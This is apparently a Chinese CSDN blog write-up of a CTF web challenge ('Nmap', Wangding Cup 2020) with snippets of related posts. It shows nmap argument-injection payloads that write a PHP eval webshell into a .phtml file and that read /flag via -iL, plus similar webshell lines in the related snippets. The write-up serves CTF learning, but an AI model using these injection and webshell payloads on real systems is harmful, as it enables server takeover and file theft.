[网鼎杯 2020 朱雀组]Nmap

最新推荐文章于 2024-04-01 20:44:04 发布
最新推荐文章于 2024-04-01 20:44:04 发布
阅读量4.4k 收藏 9
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/107746582
版权

题目
站老是崩,有点难受。
图片.png
过程
1.题目非常熟悉,以前在buu写过。主要考察nmap的一些用法。
图片.png
2.
选项 解释
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件
选项-oG
将结果Grep保存。

nmap -F -oG test.txt 192.168.23.1

选项-oA
该选项可将扫描结果以标准格式、XML格式和Grep格式一次性保存,分别放在.nmap,.xml和.gnmap文件中。

nmap -F -oA test 192.168.3.2

3.尝试对扫描结果进行指定文件保存,
输入-oN aa.txt,然后访问/aa.txt
出现:# Nmap 6.47 scan initiated Mon May 18 15:58:14 2020 as: nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/05cc1 -oN aa.txt \
4.于是猜测是否可以写一个木马文件上去,测试发现过滤了php字符串
可以上传<?=eval(\$_POST[a]);?> 文件名为phtml
payload:' -oN b.phtml <?=eval(\$_POST[a]);?>'
访问b.phtml
图片.png
5.当然还有更简单的写法。
127.0.0.1' -iL /flag -oN vege.txt '
然后直接访问即可。

浩歌已行
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
用mimiktz和nmap进行网络扫描
06-15
1.2.使用nmap不同选项完成不同需求的扫描,结合wireshark抓包工具查看不同选项的区别。 2.实验环境(硬件、软件) IP地址为192.168.126.130的Windows Server 2008 r2虚拟机, IP地址为192.168.126.129的kali linux...
BUUCTF [网鼎杯 2020 朱雀] Nmap
Senimo
12-09 3469
BUUCTF [网鼎杯 2020 朱雀] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
[网鼎杯 2020 朱雀]Nmap1
最新发布
m0_75178803的博客
04-01 939
打开题目在源代码中看到了提示先随便输入127.0.0.1那我们试试输入可以看到 | 被转义符号\所转义那我们输入 127.0.0.1 /| ls得到三条反斜线我们猜测,我们输入的东西是被escapeshellarg和escapeshellcmd处理过后的结果我们输入的东西必须绕过这两个函数。
[网鼎杯 2020 朱雀]Nmap wp
qq_64201116的博客
08-24 792
2020朱雀杯]和的题目似乎是一样的,不同在于朱雀杯没有给出源码,主要考察的都是nmap一句话木马写入。本篇文章细致讲解输入时和两个函数所进行的步骤。
BUUCTF: [网鼎杯 2020 朱雀]Nmap
末初的CSDN博客
09-21 1974
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,
BUUCTF Web [网鼎杯 2020 朱雀]Nmap1
网安小趴菜
11-16 659
BUUCTF Web [网鼎杯 2020 朱雀]Nmap wp1
网络扫描工具-nmap与zmap
12-28
网络扫描工具--nmap与zmap。
nmap7.7.0,最新官网下载版本
01-19
最新下载的NMAP7.70,工具分享。使用更可靠更稳定。欢迎大家下载使用。
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,web。web题为thinkjava
nmap nes脚本用法大全手记 网络攻防
01-24
500多个脚本用法详细说明和举例
[⽹鼎杯 2020 朱雀]Nmap
zzqzzq11的博客
12-03 407
要值得⼀提的是,这个弄完之后会有很多转译符,原因在于本来nmap就是执⾏相关的,因此很多都需要转译,⽐如 | > < { \ ' " 等等。这个题和上⾯那个nmap是⼀样的。只是过滤了下php罢了。其实就是参数值跳出来变成参数选项。细节之前已经说的差不多了。⽤phtml绕过就⾏。前⾯已经分析得很多了。
2020网鼎杯朱雀WEB——NMAP&PHPWEB
Pdsdt1的博客
05-18 4143
NMAP 考察的是比较老的知识点了,在BUU出现过的题目,nmap命令行参数注入 详细文章: https://blog.csdn.net/qq_26406447/article/details/100711933 访问题目,发现我们可以输入url,经过nmap扫描后会返回出结果,这里引入nmap命令中的一个参数 -oG #可以实现将命令和结果写到文件 源码大概的构造: echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 我们可以通过
[网鼎杯 2020 朱雀]Nmap 通过nmap写入木马 argcmd过滤实现逃逸
m0_64180167的博客
09-19 344
这道题也很好玩 啊 原本以为是ssrf 或者会不会是rce结果是通过nmap写入木马我们来玩一下。
第五十六题——[网鼎杯 2020 朱雀]Nmap
分享简单的安全技术
04-29 313
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,一个输入框,让我们输入nmap扫描的ip地址 第二步:获取flag 可以使用命令 -oG制作一句话木马,输入' <?php @eval($_POST["hack"]);?> -oG hack.php '发现提示hacker,猜测不能使用php关键字 输入' <?= @eval($_POST["hack"]);?> -oG hack.phtml '发现语句执行成功 使用蚁剑连接地址http
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络拓扑等。nmap具有强大的扫描功能和灵活的配置选项,是网络安全工作者必备的工具之一。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值